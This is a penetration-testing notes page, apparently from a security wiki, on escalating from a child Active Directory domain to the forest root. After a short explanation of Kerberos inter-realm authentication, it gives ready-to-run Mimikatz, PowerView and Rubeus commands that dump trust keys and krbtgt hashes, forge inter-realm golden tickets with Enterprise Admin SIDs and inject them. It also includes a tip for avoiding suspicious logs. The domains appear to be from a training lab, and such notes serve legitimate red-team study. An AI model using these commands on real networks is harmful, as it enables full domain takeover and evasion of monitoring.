GithubTwitter

Cross Domain Attacks

General

  • Domains in the same forest have an implicit two-way trust relationship

  • There is a trust key between the parent and child domains

  • There are two ways of escalating privileges between two domains of the same forest

    • Krbtgt hash

    • Trust tickets

Authentication Process for Resource in Different Domain

  1. Client requests TGT from DC in own domain

  2. DC sends back TGT

  3. Client shows TGT when requesting TGS for resource in another domain

  4. DC checks global catalog and finds resource in another domain

  5. DC sends back inter-realm TGT encrypted with Trust Key

  6. Client sends inter-realm TGT when requesting TGS for resource to DC of target domain

  7. DC checks if trust key is valid

  8. If yes, sends back TGS

  9. Client presents TGS when accessing target resource

  10. Target resource checks if client can access resource

Exploitation

Child to Forest Root Using Trust Key

  • Vulnerable step here is step 6, sending the TGT encrypted with trust key

  • If we have the trust key, we can forge a ticket

  • Escalate privileges from Domain Admin in current domain to Enterprise Admin or DA in forest root

Arguments

Commands

# Dump trust key from DC with mimikatz
# Look for [In] trust key from child to parent
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

# Get SID of Enterprise Admins Group using PowerView 3.0
Get-DomainGroup -Domain moneycorp.local "Enterprise Admins" | Select objectsid

# Forge inter-realm TGT
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:moneycorp.local /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:200a7dab8e762344bd76a62acac42568 /service:krbtgt /ticket:trust_key_tgt.kirbi"'

# Use inter-realm ticket to get and use TGS for CIFS service on DC of the parent domain
.\Rubeus.exe asktgs /ticket:trust_key_tgt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

# Check access
ls \\mcorp-dc.moneycorp.local\c$

Child to Forest Root Using Krbtgt Hash

  • Same principle as using trust key

  • But: no need to explicitly request TGS for specific service

  • Works like golden ticket

# Dump krbtgt hash with DA privileges
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

# Forge inter-realm TGT
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:trust_krbtgt_tgt.kirbi"'

# Avoid suspicious logs by using SID of Domain Controllers and Enterprise Domain Controllers
# S-1-5-21 = Domain Controllers
# S-1-5-9  = Enterprise Domain Controllers
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:dcorp-dc$ /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:trust_krbtgt_tgt.kirbi"'

# Inject ticket into session
Invoke-Mimikatz -Command '"kerberos::ptt trust_krbtgt_tgt.kirbi"'
PreviousTrust AttacksNextCross Forest Attacks

Last updated